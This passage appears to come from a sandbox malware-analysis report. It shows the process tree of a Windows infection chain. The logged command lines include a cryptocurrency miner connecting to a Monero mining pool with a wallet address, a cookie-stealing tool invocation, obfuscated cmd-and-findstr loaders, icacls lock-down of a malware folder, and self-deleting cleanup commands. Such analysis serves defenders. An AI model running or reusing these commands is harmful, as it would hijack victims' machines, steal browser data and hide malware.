                                                                                              • Delays execution with timeout.exe
                                                                                              PID:5832
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ld35o5cs.epm\askinstall31.exe & exit
                                                                                        15⤵
                                                                                          PID:5784
                                                                                          • C:\Users\Admin\AppData\Local\Temp\ld35o5cs.epm\askinstall31.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\ld35o5cs.epm\askinstall31.exe
                                                                                            16⤵
                                                                                              PID:8796
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                17⤵
                                                                                                  PID:8672
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im chrome.exe
                                                                                                    18⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:8316
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mymvwvuz.buz\toolspab1.exe & exit
                                                                                              15⤵
                                                                                                PID:8388
                                                                                                • C:\Users\Admin\AppData\Local\Temp\mymvwvuz.buz\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\mymvwvuz.buz\toolspab1.exe
                                                                                                  16⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:8968
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\mymvwvuz.buz\toolspab1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\mymvwvuz.buz\toolspab1.exe
                                                                                                    17⤵
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:9000
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\llyw2lr4.odc\GcleanerWW.exe /mixone & exit
                                                                                                15⤵
                                                                                                  PID:8688
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kin2kb4e.ket\setup_10.2_mix.exe & exit
                                                                                                  15⤵
                                                                                                    PID:3940
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kin2kb4e.ket\setup_10.2_mix.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\kin2kb4e.ket\setup_10.2_mix.exe
                                                                                                      16⤵
                                                                                                        PID:9048
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ikhwjtdv.pkj\file_1.exe & exit
                                                                                                      15⤵
                                                                                                        PID:5352
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ikhwjtdv.pkj\file_1.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\ikhwjtdv.pkj\file_1.exe
                                                                                                          16⤵
                                                                                                            PID:904
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
                                                                                                              17⤵
                                                                                                                PID:4456
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0XQDHST5GD\multitimer.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\0XQDHST5GD\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                  18⤵
                                                                                                                    PID:9004
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0XQDHST5GD\multitimer.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\0XQDHST5GD\multitimer.exe" 1 3.1618033444.60713b248b339 101
                                                                                                                      19⤵
                                                                                                                        PID:4928
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0XQDHST5GD\multitimer.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\0XQDHST5GD\multitimer.exe" 2 3.1618033444.60713b248b339
                                                                                                                          20⤵
                                                                                                                            PID:3968
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WYUETHUAUN\setups.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\WYUETHUAUN\setups.exe" ll
                                                                                                                        18⤵
                                                                                                                          PID:7824
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-N57QN.tmp\setups.tmp
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-N57QN.tmp\setups.tmp" /SL5="$702EC,1873631,71168,C:\Users\Admin\AppData\Local\Temp\WYUETHUAUN\setups.exe" ll
                                                                                                                            19⤵
                                                                                                                              PID:8236
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe"
                                                                                                                          17⤵
                                                                                                                            PID:7144
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                              18⤵
                                                                                                                                PID:7076
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                              17⤵
                                                                                                                                PID:8632
                                                                                                                                • C:\Users\Admin\AppData\Roaming\C0D1.tmp.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\C0D1.tmp.exe"
                                                                                                                                  18⤵
                                                                                                                                    PID:5084
                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w8499 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                      19⤵
                                                                                                                                        PID:6308
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqmglbj5.a3e\6762a766.exe & exit
                                                                                                                                15⤵
                                                                                                                                  PID:6596
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\aqmglbj5.a3e\6762a766.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\aqmglbj5.a3e\6762a766.exe
                                                                                                                                    16⤵
                                                                                                                                      PID:4268
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j4pkqs2k.duc\app.exe /8-2222 & exit
                                                                                                                                    15⤵
                                                                                                                                      PID:8832
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\j4pkqs2k.duc\app.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\j4pkqs2k.duc\app.exe /8-2222
                                                                                                                                        16⤵
                                                                                                                                          PID:6868
                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                                                                                                11⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:4268
                                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                                                                  12⤵
                                                                                                                                    PID:4684
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                                                                                    12⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:5680
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      13⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:4952
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\System32\cmd.exe
                                                                                                                                      13⤵
                                                                                                                                        PID:6816
                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          findstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx
                                                                                                                                          14⤵
                                                                                                                                            PID:6624
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                            Infinita.exe.com x
                                                                                                                                            14⤵
                                                                                                                                              PID:9056
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x
                                                                                                                                                15⤵
                                                                                                                                                  PID:9160
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                                                                    16⤵
                                                                                                                                                      PID:1232
                                                                                                                                                      • C:\Users\Admin\Videos\xmrmin.exe
                                                                                                                                                        "C:\Users\Admin\Videos\xmrmin.exe"
                                                                                                                                                        17⤵
                                                                                                                                                          PID:8984
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                            18⤵
                                                                                                                                                              PID:6444
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                                                              18⤵
                                                                                                                                                                PID:8076
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                  19⤵
                                                                                                                                                                    PID:7188
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                                                                      20⤵
                                                                                                                                                                        PID:5308
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                          21⤵
                                                                                                                                                                            PID:7344
                                                                                                                                                                  • C:\Users\Admin\Videos\ethminer.exe
                                                                                                                                                                    "C:\Users\Admin\Videos\ethminer.exe"
                                                                                                                                                                    17⤵
                                                                                                                                                                      PID:8156
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                        18⤵
                                                                                                                                                                          PID:8768
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                                                                          18⤵
                                                                                                                                                                            PID:4408
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                              19⤵
                                                                                                                                                                                PID:3420
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                                                                                  20⤵
                                                                                                                                                                                    PID:7800
                                                                                                                                                                            • C:\Users\Admin\Videos\111.exe
                                                                                                                                                                              "C:\Users\Admin\Videos\111.exe"
                                                                                                                                                                              17⤵
                                                                                                                                                                                PID:9172
                                                                                                                                                                                • C:\Users\Admin\Videos\111.exe
                                                                                                                                                                                  "C:\Users\Admin\Videos\111.exe"
                                                                                                                                                                                  18⤵
                                                                                                                                                                                    PID:8248
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                                                                      19⤵
                                                                                                                                                                                        PID:5612
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
                                                                                                                                                                                          20⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:3328
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
                                                                                                                                                                                          20⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:5772
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                                                                          20⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:9144
                                                                                                                                                                                  • C:\Users\Admin\Videos\Vickybuild.exe
                                                                                                                                                                                    "C:\Users\Admin\Videos\Vickybuild.exe"
                                                                                                                                                                                    17⤵
                                                                                                                                                                                      PID:7104
                                                                                                                                                                                      • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                        "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                        18⤵
                                                                                                                                                                                          PID:8176
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            19⤵
                                                                                                                                                                                              PID:7664
                                                                                                                                                                                          • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                            "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                            18⤵
                                                                                                                                                                                              PID:8256
                                                                                                                                                                                            • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                              "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                              18⤵
                                                                                                                                                                                                PID:7492
                                                                                                                                                                                              • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                18⤵
                                                                                                                                                                                                  PID:7876
                                                                                                                                                                                                • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                  "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                    PID:8356
                                                                                                                                                                                                  • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                    "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                    PID:7940
                                                                                                                                                                                                  • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                    "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                      PID:3980
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Distrutta.mp3
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                        PID:8900
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          19⤵
                                                                                                                                                                                                            PID:6884
                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                              findstr /V /R "^YNGHlhExSzslEWJWrMZhPQjfSqWRNvlCXrLShhuEbPCprUEacSOmXABiAdOldMGcpOjBlQJPFcQqgejXcEvVIKFbBDsWmWhKouZfIri$" Saluta.mp3
                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                PID:7932
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com
                                                                                                                                                                                                                Uscio.exe.com Q
                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                  PID:8664
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com Q
                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:5236
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\RegAsm.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\RegAsm.exe
                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                        PID:7492
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                    ping 127.0.0.1 -n 30
                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                    PID:6840
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 1232 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"
                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                PID:8276
                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                  taskkill /F /PID 1232
                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:7308
                                                                                                                                                                                                                • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                    PID:4824
                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 30
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:9016
                                                                                                                                                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe"
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:5088
                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                            PID:5224
                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                              PID:5188
                                                                                                                                                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                            PID:5352
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-TLIN1.tmp\lylal220.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-TLIN1.tmp\lylal220.tmp" /SL5="$30434,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LQ9T8.tmp\ysAGEL.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LQ9T8.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                PID:5356
                                                                                                                                                                                                                • C:\Program Files\Windows Multimedia Platform\YOAABXVVHY\irecord.exe
                                                                                                                                                                                                                  "C:\Program Files\Windows Multimedia Platform\YOAABXVVHY\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:6568
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-M1E6V.tmp\irecord.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-M1E6V.tmp\irecord.tmp" /SL5="$604EA,5922518,66560,C:\Program Files\Windows Multimedia Platform\YOAABXVVHY\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                                    • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:7040
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\41-b72a0-e66-801a5-7879a23552f0a\Gebipadone.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\41-b72a0-e66-801a5-7879a23552f0a\Gebipadone.exe"
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  PID:6404
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\b8-96d9e-939-5c689-09b1f333ec1d6\Maeqegowylo.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\b8-96d9e-939-5c689-09b1f333ec1d6\Maeqegowylo.exe"
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4344
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yhtznlwe.vkz\gaooo.exe & exit
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                      PID:7300
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\yhtznlwe.vkz\gaooo.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\yhtznlwe.vkz\gaooo.exe
                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:7652
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:8120
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:7712
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prw52wb0.r3m\jg8_8qyu.exe & exit
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:7812
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\prw52wb0.r3m\jg8_8qyu.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\prw52wb0.r3m\jg8_8qyu.exe
                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                            PID:4200
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fnilarg5.0du\google-game.exe & exit
                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                            PID:5300
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fnilarg5.0du\google-game.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\fnilarg5.0du\google-game.exe
                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                PID:5236
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                  PID:7284
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\513otgkq.3oh\Sabor.exe & exit
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:2292
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\513otgkq.3oh\Sabor.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\513otgkq.3oh\Sabor.exe
                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                  PID:5088
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3sfcfch.bsk\BarSetpFile.exe /silent & exit
                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                  PID:5436
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\l3sfcfch.bsk\BarSetpFile.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\l3sfcfch.bsk\BarSetpFile.exe /silent
                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                      PID:5732
                                                                                                                                                                                                                                      • C:\ProgramData\6955160.exe
                                                                                                                                                                                                                                        "C:\ProgramData\6955160.exe"
                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                          PID:8452
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kurye4qa.sge\wwfvd.exe & exit
                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                        PID:4328
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kurye4qa.sge\wwfvd.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\kurye4qa.sge\wwfvd.exe
                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          PID:8548
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\kurye4qa.sge\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                              PID:8396
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                taskkill /im wwfvd.exe /f
                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
